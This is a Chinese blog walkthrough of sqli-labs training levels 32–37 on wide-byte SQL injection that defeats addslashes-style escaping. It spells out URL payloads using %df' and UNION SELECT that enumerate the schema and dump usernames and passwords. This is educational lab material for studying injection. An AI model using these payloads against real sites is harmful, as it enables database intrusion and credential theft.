(手工)【sqli-labs32-38】宽字节注入、报错回显、字符/数字型注入

已于 2022-07-15 09:38:21 修改
阅读量796 收藏 4
点赞数 1
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-14 19:25:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125784235
版权

目录

一、推荐:

二、(手工)SQL注入基本步骤:

三、Less32(GET-Bypass custom filter adding slashes to dangerous chars)

3.1、简介:(宽字节注入-报错回显-字符型注入)

3.2、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

3.8、第七步:爆数据

四、Less33(GET-Bypass AddSlashes())

4.1、简介:(宽字节注入-报错回显-字符型注入)

4.2、利用:

五、Less34(POST-Bypass AddSlashes())

5.1、简介:(宽字节注入-报错回显-字符型注入)

5.2、利用:

六、Less35(GET-Bypass AddSlashes(we dont need them) integer based)

6.1、简介:(宽字节注入-编码-报错回显-数字型注入)

6.2、利用:

七、Less36(GET-Bypass MYSQL_real_escape_string)

7.1、简介:(宽字节注入-报错回显-字符型注入)

7.2、利用:

八、Less37(POST-Bypass MYSQL_real_escape_string)

8.1、简介:(宽字节注入-报错回显-字符型注入)

8.2、利用:

一、推荐:

【SQL注入】宽字节注入:原理、利用https://blog.csdn.net/qq_53079406/article/details/125785293?spm=1001.2014.3001.5501

【SQL注入-可回显】报错注入:简介、相关函数、利用方法https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165777639916781647571668%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165777639916781647571668&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165777639916781647571668%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165777639916781647571668&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

三、Less32(GET-Bypass custom filter adding slashes to dangerous chars)

3.1、简介:(宽字节注入-报错回显-字符型注入)

请求方法:GET

方法:宽字节注入+闭合(字符型注入)+报错回显

3.2、第一步:注入点测试

输入?id=1 

 后面加上单引号、双引号都不报错

 根据下面的提示,可知

是引号被\转义了

无法判断是否存在注入点

考虑使用宽字节注入

?id=1%df'

加单引号报错,说明存在注入点

 ?id=1%df'#

#被过滤

 ?id=1%df'--+

说明为单引号注入

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

方法三:

eg:输入?id=and or union select --+ updatexml # extractvalue(重要的都输进去)

看输入回显过滤语句的情况

#被过滤了 

3.4、第三步:判断字段数/回显位

?id=1%df' union select 1,2,3 --+

回显正常

?id=1%df' union select 1,2,3,4 --+

报错

 说明字段数为3

判断回显位

?id=-1%df' union select 1,2,3 --+

3.5、第四步:暴库

?id=-1%df' union select 1,2,database() --+

3.6、第五步:爆表名

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

'security'的单引号也会被转义,可以直接进行十六进制编码,或者使用database()

3.7、第六步:爆字段

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

'user'的单引号也会被转义,可以直接进行十六进制编码

3.8、第七步:爆数据

?id=-1%df' union select 1,2,group_concat(username,password) from security.users--+

四、Less33(GET-Bypass AddSlashes())

4.1、简介:(宽字节注入-报错回显-字符型注入)

请求方法:GET

方法:宽字节注入+闭合(字符型注入)+报错回显

4.2、利用:

与32关一模一样

五、Less34(POST-Bypass AddSlashes())

5.1、简介:(宽字节注入-报错回显-字符型注入)

请求方法:POST

方法:宽字节注入+闭合(字符型注入)+报错回显

5.2、利用:

将32、33改为POST提交

其余没变,不试了

六、Less35(GET-Bypass AddSlashes(we dont need them) integer based)

6.1、简介:(宽字节注入-编码-报错回显-数字型注入)

请求方法:POST

方法:宽字节注入+闭合(数字型注入)+编码+报错回显

6.2、利用:

(手工)【sqli-labs35】宽字节、数字型、编码、报错注入icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125792425?spm=1001.2014.3001.5501

七、Less36(GET-Bypass MYSQL_real_escape_string)

7.1、简介:(宽字节注入-报错回显-字符型注入)

请求方法:GET

方法:宽字节注入+闭合(字符型注入)+报错回显

7.2、利用:

同Less32的payload

八、Less37(POST-Bypass MYSQL_real_escape_string)

8.1、简介:(宽字节注入-报错回显-字符型注入)

请求方法:GET

方法:宽字节注入+闭合(字符型注入)+报错回显

8.2、利用:

同Less32的payload

黑色地带(崛起)
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
基于Sqli-Labs靶场的SQL注入-32~37关
Joker
01-09 1215
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1102
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
SQLi 38关_sqli-labs 38(2)
最新发布
2401_84264692的博客
05-17 713
此处 id=-1 , 由于id不能为负数 , 所以该SQL查询不到用户数据 , 返回的结果就只有 联合查询的 1 2 3 这一条数据 , 目的在于方便展示字段显示位置。至此可知 , 数据库 security, 表 users, 字段 id,users,password , 下一步 ,根据此信息查询账号和密码。查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名。users表为用户表 , 下一步根据users表获取其所有字段。
SQL-labs的第34关——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 353
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
SQL注入漏洞-09】宽字节注入靶场实战
cc
02-07 5639
如果数据库使用的是DBK编码,而PHP使用的是UTF-8编码 ,那这样就可能出现注入问题。原因是程序员为了防止SQL注入,就会调用addslashes转移函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上转义字符(\)进行转义 ,但这样并非安全,因为数据库使用的是字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF-8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和转义字符(\)组合被当作一个汉字,从而保留单或双引号,成功进行宽字节注入
SQL注入——宽字节注入
weixin_74991270的博客
10-10 461
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs进阶篇 32关~38
Lucky小小吴的小屋
02-06 927
本文章主要讲述sqli-labs靶场第32关到38关的通关心得,从三方面讲述如何通关,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sql-labs闯关32~37
qq_44663230的博客
09-04 2037
sql-labs闯关32~37 宽字节注入集合
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 328
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1163
sqli-labs,sql注入
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5674
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
sqlilabs38-53详细教程
黑白的博客
11-08 523
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
sqli-labs/Less-32
m0_71299382的博客
11-20 310
sqli-labs第三十二关
sqli32关:宽字节注入
dirich的博客
06-13 390
字节顾名思义就是两个及以上的字节表示一个中文汉字。在sql注入中,当用户输入中包含特殊字符,比如(单引号’),(双引号"),(斜杠/)等,为了过滤用户输入的这些特殊字符,会在字符前面加一个\转义字符对特殊字符进行转义。而大多数网站使用utf-8编码,utf-8编码会认为一个中文字符占三个字节;而后端mysql常用GBK编码,GBK编码认为一个中文占两个字节。所以针对这个原理,我们可以构造中文汉字来绕过字符转义。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值